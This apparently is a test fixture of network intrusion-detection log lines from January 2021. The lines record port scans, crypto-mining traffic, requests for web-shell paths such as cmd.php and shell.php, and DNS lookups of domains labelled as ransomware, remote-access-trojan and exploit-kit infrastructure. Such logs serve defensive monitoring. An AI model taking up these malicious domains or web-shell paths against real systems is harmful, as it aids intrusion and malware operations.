    '"2021-01-11 03:53:33.000574" r2d2 2.200.108.59 12604,12606,12607,12608,12610,12611,12613,33626,33722,33828,36200,36428,36900,36988,37030,37332,38054,38124,39312,41224,41774,42218,42686,42837,42839,42840,43002,43732,44100,44686,44704,44990,45310,45736,46824,47302,47832,48576,48906,48908,48910,49150,49530,51504,51802,51826,51986,52694,52952,53084,53582,53604,54394,54880,55552,55754,55862,56648,57422,57674,57782,58074,58152,58410,58826,59174,59434,59640,59976,60482,60554,60920,60942 77.53.81.105 21,6688,7249,10369,11431,13477,14356,14473,15490,17717,18501,19633,21526,22396,23010,23429,24119,25894,26009,26219,27353,27457,28568,29289,29654,31684,31868,32696,35417,36460,36615,36797,37821,38322,38478,39392,40594,41137,42065,42232,42837,43051,44692,45542,46887,49610,50177,50359,50669,50775,50998,51588,54238,56924,58391,59973,60863,61505,62292,62313,64557 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:53:45.886095" r2d2 10.43.192.103 59216 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:53:49.597209" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:49.597201" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:49.597217" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:49.597212" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:49.597135" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:49.597211" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:53:59.611103" r2d2 2.200.107.146 22564 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:53:59.608213" r2d2 2.200.110.232 64714 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:53:59.608390" r2d2 2.200.110.232 63701 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:53:59.611105" r2d2 2.200.107.146 24481 199.249.112.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:54:03.985959" r2d2 10.43.192.103 59219 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:54:04.268808" r2d2 2.200.110.232 63904 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:54:16.066856" r2d2 10.43.192.103 59221 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:54:17.856881" r2d2 2.200.110.232 63979 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:54:17.894689" r2d2 2.200.110.233 63779 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:54:18.248724" r2d2 2.200.110.233 63797 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:54:18.566548" r2d2 2.200.110.232 63971 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:54:18.568186" r2d2 2.200.107.146 16427 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:54:18.595723" r2d2 2.200.110.233 64865 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:54:19.259312" r2d2 2.200.110.233 63753 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:54:22.094539" r2d2 10.43.192.103 59222 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:54:22.446672" r2d2 2.200.110.232 63439 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:54:25.416943" r2d2 2.200.110.232 64343 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:54:25.418547" r2d2 2.200.107.146 21703 185.104.28.19 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:54:22.837229" r2d2 10.1.19.42 59633 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:54:30.219085" r2d2 2.200.110.233 64416 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:54:34.169163" r2d2 10.43.192.103 59224 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:54:43.118131" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:43.118136" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:43.118141" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:43.118143" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:43.118055" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:43.118139" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:47.378731" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:47.477023" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:47.576244" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:47.777852" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:48.076149" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:48.476413" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:48.823066" r2d2 2.200.107.146 44983 194.0.11.112 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 03:54:48.981966" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:49.080492" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:49.080493" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:49.080485" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:54:49.576470" r2d2 10.3.160.42 14131 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:54:52.271763" r2d2 10.43.192.103 59227 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:55:04.354405" r2d2 10.43.192.103 59229 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:55:10.384379" r2d2 10.43.192.103 59230 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:55:19.242423" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:55:19.242429" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:55:19.242427" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:55:19.242431" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:55:19.242428" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:55:19.242432" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:55:22.472518" r2d2 10.43.192.103 59232 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:55:24.737349" r2d2 10.1.19.42 59634 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:55:30.742911" r2d2 2.200.110.233 63473 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:55:30.744366" r2d2 2.200.107.146 18364 190.9.129.56 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:55:32.492663" r2d2 2.200.110.232 63630 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:55:32.493891" r2d2 2.200.107.146 51850 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:55:32.527992" r2d2 2.200.110.233 64111 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:55:40.577501" r2d2 10.43.192.103 59240 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:55:42.258609" r2d2 2.200.107.248 13874 8.8.8.8 53 UDP DNS (update).drp.su "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:55:43.381519" r2d2 2.200.110.232 49485 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:55:43.383429" r2d2 2.200.107.146 45398 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:55:43.394547" r2d2 2.200.110.232 49283 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:55:43.482978" r2d2 2.200.110.232 64733 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:55:43.509084" r2d2 2.200.110.233 64798 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:55:58.692000" r2d2 10.43.192.103 59243 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:55:59.626485" r2d2 2.200.110.232 64289 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:56:10.766130" r2d2 10.43.192.103 59245 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:56:16.793587" r2d2 10.43.192.103 59246 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:56:28.875863" r2d2 10.43.192.103 59248 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:56:37.850870" r2d2 2.200.110.232 65100 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:56:38.004900" r2d2 2.200.110.232 49329 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:56:38.006684" r2d2 2.200.107.146 32195 192.55.83.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:56:38.038695" r2d2 2.200.110.233 64008 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:56:38.081088" r2d2 2.200.110.232 64167 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:56:38.082652" r2d2 2.200.107.146 22595 192.31.80.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:56:38.092006" r2d2 2.200.107.146 3674 192.35.51.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:56:38.090478" r2d2 2.200.110.232 64660 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:56:38.091000" r2d2 2.200.110.232 65275 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:56:38.092572" r2d2 2.200.107.146 59350 97.74.108.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:56:38.114296" r2d2 2.200.110.233 64673 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:56:38.270801" r2d2 2.200.110.232 49180 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:56:38.310976" r2d2 2.200.110.232 63888 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:56:38.592347" r2d2 2.200.110.232 65047 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:56:39.470828" r2d2 2.200.110.232 65330 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:56:40.921010" r2d2 2.200.110.232 65068 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:56:40.931038" r2d2 2.200.110.232 64843 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:56:42.532512" r2d2 2.200.110.232 64042 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:56:42.533863" r2d2 2.200.107.146 32902 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:56:42.559353" r2d2 2.200.110.233 65512 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:56:46.962151" r2d2 10.43.192.103 59251 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:56:53.021915" r2d2 10.43.192.103 59253 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:56:59.609108" r2d2 2.200.110.232 64315 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:56:59.613860" r2d2 2.200.107.146 59056 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:56:59.627315" r2d2 2.200.110.232 49223 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:57:05.093280" r2d2 10.43.192.103 59256 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:57:20.889432" r2d2 2.200.110.232 65394 2.200.107.168 53 UDP DNS work.a-poster.info "tofsee (malware)" (static)\n' +
    '"2021-01-11 03:57:23.197966" r2d2 10.43.192.103 59259 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:57:35.262308" r2d2 10.43.192.103 59261 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:57:36.050614" r2d2 2.200.110.232 63700 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:57:36.579989" r2d2 2.200.110.232 63734 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:57:43.392812" r2d2 2.200.110.232 64809 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:57:43.394473" r2d2 2.200.110.232 63670 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:57:43.395478" r2d2 2.200.107.146 16532 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:57:43.396785" r2d2 2.200.107.146 60339 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:57:47.351146" r2d2 10.43.192.103 59265 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:57:48.229409" r2d2 2.200.97.1 53347 8.8.8.8 53 UDP DNS checkip.dyndns.com "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:57:48.605263" r2d2 2.200.110.233 64987 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:57:52.564708" r2d2 2.200.110.233 65189 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:57:53.384889" r2d2 10.43.192.103 59266 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:57:59.411528" r2d2 10.43.192.103 59268 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:58:17.530349" r2d2 10.43.192.103 59271 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:58:29.598984" r2d2 10.43.192.103 59273 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:58:24.958828" r2d2 178.17.174.14 53150 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; BTRS106369; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTbFWV5/5.14.1.20007; .NET4.0C; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:58:35.630941" r2d2 10.43.192.103 59274 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:58:43.383276" r2d2 2.200.110.232 65234 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:58:47.703562" r2d2 10.43.192.103 59279 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:58:47.757800" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:47.858533" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:47.956057" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:48.156317" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:48.456276" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:48.856298" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:49.357756" r2d2 10.3.160.42 14133 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:58:57.865217" r2d2 2.200.110.232 65473 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:58:57.902374" r2d2 2.200.110.233 64957 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:58:57.913106" r2d2 2.200.110.233 63326 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:58:58.126640" r2d2 2.200.110.233 65305 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:58:59.618730" r2d2 2.200.110.232 63887 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:58:59.781150" r2d2 10.43.192.103 59282 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:59:02.600318" r2d2 2.200.110.233 63838 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:59:11.852365" r2d2 10.43.192.103 59284 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:59:08.184924" r2d2 10.1.19.42 59636 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:59:29.989638" r2d2 10.43.192.103 59287 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:59:42.065653" r2d2 10.43.192.103 59292 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:59:59.614524" r2d2 2.200.107.146 8072 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:59:59.612109" r2d2 2.200.110.232 65021 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:00:00.173962" r2d2 10.43.192.103 59295 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:00:12.263427" r2d2 10.43.192.103 59297 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:00:12.617471" r2d2 2.200.110.232 64583 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:00:12.646315" r2d2 2.200.110.233 63734 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:00:18.301452" r2d2 10.43.192.103 59298 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:00:30.387200" r2d2 10.43.192.103 59300 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:00:47.947981" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:48.047752" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:48.145762" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:48.345472" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:48.485577" r2d2 10.43.192.103 59303 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:00:48.645508" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:49.045329" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:50.145588" r2d2 10.3.160.42 14134 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:00:59.625491" r2d2 2.200.110.232 64403 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:01:00.569720" r2d2 10.43.192.103 59321 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:01:06.604407" r2d2 10.43.192.103 59322 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:01:07.832261" r2d2 10.18.20.51 61053 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:01:09.597859" r2d2 10.18.20.51 61053 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:01:07.803082" r2d2 10.18.20.51 61053 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:01:17.556315" r2d2 8.8.8.8 53 2.200.110.135 29816 UDP DNS (drtfhtfyhtdyydtr).com "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:01:18.139142" r2d2 2.200.110.232 64613 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 04:01:18.175966" r2d2 2.200.110.233 64961 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 04:01:18.621342" r2d2 2.200.110.233 65296 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:01:18.673406" r2d2 10.43.192.103 59324 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:01:22.649806" r2d2 2.200.110.232 63994 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:01:22.701529" r2d2 2.200.110.233 64239 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:01:30.229794" r2d2 2.200.110.232 65315 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:01:30.231397" r2d2 2.200.107.146 56268 77.72.229.253 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:01:36.776272" r2d2 10.43.192.103 59327 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
